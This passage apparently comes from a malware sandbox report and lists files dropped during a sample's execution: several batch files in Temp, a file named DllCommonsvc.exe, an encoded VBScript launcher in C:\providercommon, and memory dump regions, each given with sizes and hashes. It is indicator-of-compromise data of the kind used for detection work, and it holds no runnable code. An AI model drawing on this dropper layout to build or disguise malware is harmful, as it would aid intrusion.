                                          04f543f930c3e650258e20224522c33a

                                          SHA1

                                          942198747501dfc8bdd67fe50ec56564dd7b56b8

                                          SHA256

                                          6cb93b62edf3c77202b83f6b3cb7e5c0a120c30542c0a58e8f065f0dce2468e7

                                          SHA512

                                          6af221e5454e4323a1979d926d2850c257a0b78c22d7a8197ae2da2e94f422b15a478788f2345219db0e34aa6d7b841ce06a82ed7424a619f1ac39124abcd765

                                        • C:\Users\Admin\AppData\Local\Temp\EqBdbgL5Ji.bat

                                          Filesize

                                          229B

                                          MD5

                                          a0e1c726c11f946e3913ab13944a4d3d

                                          SHA1

                                          656de254437530181ca14be4fa95463840002c2b

                                          SHA256

                                          ba5736121bcdc1f96fc04ab0de4b9eb622200544daf0f6565189b84bbbba331f

                                          SHA512

                                          447be5f820e5c4de24ce45fb63edc5785566570c4d89139f17738fc0053563b3eaa02cccaa881760806cd11a314c880c68066793249b6be14a989aafad800bfe

                                        • C:\Users\Admin\AppData\Local\Temp\F1gdtReUkn.bat

                                          Filesize

                                          229B

                                          MD5

                                          57c2e17457b1bcc3afc4bd1111a10258

                                          SHA1

                                          8fc40c87530b48cdc26067c8f9c760c5d39a8165

                                          SHA256

                                          e5bf0fd33d62aa9a09bd15c17a509513cf580333c9c5cf87ec86e020351a4aad

                                          SHA512

                                          b684d6ffcf519bb6c3a44ae623a146bfb85f3f96785ce6abccf6d0a60484c7cc85d1dfc74259c8da1fa47fec38e1560075145f19078ebdce0046f22b5e59cc51

                                        • C:\Users\Admin\AppData\Local\Temp\I1ExlHFW7K.bat

                                          Filesize

                                          229B

                                          MD5

                                          d97c1ec48783a23f9decea241fb703aa

                                          SHA1

                                          352bfa7d2861bf618ba11e60dd9e21582ddb86d0

                                          SHA256

                                          6dad202024fbb34ac2683ed1bc781e7b791ede9af08a402829cfbd5ad76a44e3

                                          SHA512

                                          dd1d6b8fec3d5d4faeab6fce79c2a6be7180b50974eca01b8682ef1b79f633a71cd250aef8490a4c39786b16730e57987c3e9c4ed4e050803ee91587a4f6c01a

                                        • C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat

                                          Filesize

                                          229B

                                          MD5

                                          1a581f0547eb85a52b9ac0708d2c650a

                                          SHA1

                                          4a81d7b74dc20e8b541981ce1cc8cd722f16ce18

                                          SHA256

                                          90fcb2c9be38d805025dbe481f470bb2c985107dc7888743dedff76b9b9104fd

                                          SHA512

                                          b8e996b42e7b5aa3f2c69b6a16e206efdd0309409197ea55f7918d00dacb973f926147bcca1fec86a87d9ad81dca6bd06b06e0a10bc78635062da6eb63d481e6

                                        • C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat

                                          Filesize

                                          229B

                                          MD5

                                          f7e1582cb2509310eb1e7a4a425068da

                                          SHA1

                                          65983a5599051760c58716630641f90b82e88e8f

                                          SHA256

                                          4805e93141d7ff04b4a3e8061d44352b5e645e0507fe3afa7801fe2236371c23

                                          SHA512

                                          a30d5b7242dbac5d056fb34e37e9e1d86d5a74408543cea9b6a30caa1312eb0e9a85826339789192c97a71ba76e82cd080c071bbc94b07081e737c3280d2cd2f

                                        • C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat

                                          Filesize

                                          229B

                                          MD5

                                          bc9b750b27aa129b20055a3e88e8184c

                                          SHA1

                                          f4195c60057aba27f07020636f7ebca893ed9aa6

                                          SHA256

                                          b77e5d4d2f4e3c8d70a5d2170ca0733cb9c31514edafb253f4db9aad145bcc28

                                          SHA512

                                          0cd5c4e58730632383c81fd245a0893757e4331ff1631fc2c899f26fa518604033fff50298c4f1cf1dd789d2356efac573d0a08eb2f3701d2a58d871173b25cd

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsm0e3ga.ym4.ps1

                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • C:\Users\Admin\AppData\Local\Temp\lHo4kC1bcD.bat

                                          Filesize

                                          229B

                                          MD5

                                          34e35929ae7c7a58453e7344c1cae4c4

                                          SHA1

                                          0647ad8f6772415d6d7ac3c58e0cd778c5d7b0b5

                                          SHA256

                                          ac81f1b6dd183cb27e94d05275909929c490e4bd3a9b9461ae88b45d1f8cc2a2

                                          SHA512

                                          5c98958828129e96fabfe09007a58688be30673d5f5d0d83764375106ee7b657f6f558e1d37e05c42b22a3dfbba7533bb4cba36fe62b4288b0c069c63844885e

                                        • C:\Users\Admin\AppData\Local\Temp\pI0EcicZAo.bat

                                          Filesize

                                          229B

                                          MD5

                                          37aca9290edafdd34bf764a7c33437ec

                                          SHA1

                                          0a797fbfd8c23b3164a6b2ce75254bad5ee10901

                                          SHA256

                                          55f7fdd8f1f03993b70becc3987d444525c6195c326d45d83953ee523fc4966f

                                          SHA512

                                          dcebe3d4c094165132255211a59d5750321d0246bce28880827f163d38952e6b8b68cf2947c9be619a39e606f48e959da1129d148e396dd73981333a66350c0f

                                        • C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat

                                          Filesize

                                          229B

                                          MD5

                                          ee184ddb27f612db257cb4b02ba7fe36

                                          SHA1

                                          3ad50d3e54d66142fca0e66839a9530e5c6c8ce7

                                          SHA256

                                          c2cf0fbfcac7f423c472fb2361117942de321bff1d5f294665fc677311bfff13

                                          SHA512

                                          fb8621bfe85e7a67d89ce08647ee629f89a604e3581d22db4c01f447d8c32621fd5d9d547d070fa527fe950ef5a18912f1e39b6f8826f6fbf9c70897fd471969

                                        • C:\Users\Admin\AppData\Local\Temp\zDcPfnAXs0.bat

                                          Filesize

                                          229B

                                          MD5

                                          69ebe303328085602864f43ec584a166

                                          SHA1

                                          e6f0b4cf526b12e746cd4dd732fde2d842e7be3a

                                          SHA256

                                          355137eee0b81e411f19ebdb34282882c528d4955d1f0422395018d7a6c16577

                                          SHA512

                                          5ca08f9ec1a15f655d400effdb09d6519fecc78128aecf38c9fffffabe25faa10ac82f8dd12701a7752f449ce16be6796cedce13e802ecf9737497b8af5dd985

                                        • C:\providercommon\1zu9dW.bat

                                          Filesize

                                          36B

                                          MD5

                                          6783c3ee07c7d151ceac57f1f9c8bed7

                                          SHA1

                                          17468f98f95bf504cc1f83c49e49a78526b3ea03

                                          SHA256

                                          8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                          SHA512

                                          c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                        • C:\providercommon\DllCommonsvc.exe

                                          Filesize

                                          1.0MB

                                          MD5

                                          bd31e94b4143c4ce49c17d3af46bcad0

                                          SHA1

                                          f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                          SHA256

                                          b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                          SHA512

                                          f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                        • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                          Filesize

                                          197B

                                          MD5

                                          8088241160261560a02c84025d107592

                                          SHA1

                                          083121f7027557570994c9fc211df61730455bb5

                                          SHA256

                                          2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                          SHA512

                                          20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                        • memory/2404-255-0x0000000001860000-0x0000000001872000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/2928-218-0x000000001B7F0000-0x000000001B802000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/3352-47-0x0000012FA14F0000-0x0000012FA1512000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/3544-14-0x0000000002BC0000-0x0000000002BD2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/3544-15-0x0000000002BE0000-0x0000000002BEC000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/3544-16-0x0000000002BD0000-0x0000000002BDC000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/3544-13-0x0000000000780000-0x0000000000890000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3544-12-0x00007FFCE63A3000-0x00007FFCE63A5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3544-17-0x000000001B3C0000-0x000000001B3CC000-memory.dmp

                                          Filesize

                                          48KB

                                        • memory/4528-211-0x0000000001440000-0x0000000001452000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/4712-204-0x0000000001800000-0x0000000001812000-memory.dmp

                                          Filesize

                                          72KB

                                        We care about your privacy.

                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.